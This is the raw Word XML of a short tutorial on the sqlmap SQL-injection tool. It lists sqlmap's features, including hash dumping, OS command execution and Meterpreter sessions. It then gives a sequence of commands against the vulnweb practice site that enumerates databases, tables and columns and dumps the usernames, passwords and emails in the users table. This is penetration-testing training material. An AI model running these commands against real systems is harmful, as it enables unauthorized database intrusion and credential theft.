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A31" w:rsidRPr="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>SQLMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRPr="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3A31">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B4921" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Kali Linux, </w:t>
      </w:r>
      <w:r>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a free and open-source web server and web application scanner. </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve">sqlmap is an </w:t>
      </w:r>
      <w:r>
        <w:t>open-source</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve"> penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve"> and a broad range of switches lasting from database fingerprinting, over data fetching from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</w:t>
      </w:r>
      <w:r w:rsidR="00614041">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00614041" w:rsidRPr="00614041">
        <w:t>sqlmap goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31"/>
    <w:p w:rsidR="003C3A31" w:rsidRPr="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3A31">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The following are the features of the Sqlmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Full support for MySQL, Oracle, PostgreSQL, Microsoft SQ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L Server, Microsoft Access, IBM </w:t>
      </w:r>
      <w:r>
        <w:t>DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked </w:t>
      </w:r>
      <w:r>
        <w:t>queries,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and out-of-band.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and database name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Support to enumerate users, password hashes, privileges, roles, databases, tables</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and columns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Support to dump database tables entirely, a range of entries</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3A31">
        <w:t>Support to search for specific database names, specific tables across all databases</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve"> or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain </w:t>
      </w:r>
      <w:r>
        <w:t>strings</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve"> like name and pass. </w:t>
      </w:r>
      <w:r>
        <w:t>Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or Microsoft SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Support to execute arbitrary commands and retrieve their standard output on the database server underlying </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>operating system when the database software is MySQL, PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or Microsoft SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3A31" w:rsidRDefault="003C3A31" w:rsidP="003C3A31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3A31">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t>operating system. This channel can be an interactive command prompt, a Meterpreter session</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve"> or a graphical user interface (VNC) session as per </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C3A31">
        <w:t xml:space="preserve">user's choice. </w:t>
      </w:r>
      <w:r>
        <w:t>Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A6ACA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A6ACA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If you're using K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ali Linux,</w:t>
      </w:r>
      <w:r w:rsidRPr="004A6ACA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A6ACA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>comes preinstalled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRPr="00570625" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00570625">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:r w:rsidRPr="00F417EA">
        <w:t xml:space="preserve">To check or scan the </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F417EA">
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and create</w:t>
      </w:r>
      <w:r w:rsidRPr="00F417EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F417EA">
        <w:t xml:space="preserve">report using the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlmap </w:t>
      </w:r>
      <w:r w:rsidRPr="00F417EA">
        <w:t>tool we can execute the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Sqlmap –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4234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lmap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234815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acurat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="43154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lmap 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315460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acurat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –T users --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>colums</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4306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qlmap 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06570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acurat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –T users –C </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="42773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qlmap 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77360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acurat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –T users –C </w:t>
      </w:r>
      <w:r>
        <w:t>pass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4245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qlmap 5.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rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="00614041" w:rsidRDefault="00614041" w:rsidP="004A6ACA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00DA053D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> –D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acurat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –T users –C </w:t>
      </w:r>
      <w:r>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="42233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qlmap 6.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223385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA"/>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A6ACA" w:rsidRDefault="004A6ACA" w:rsidP="004A6ACA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:rPr>
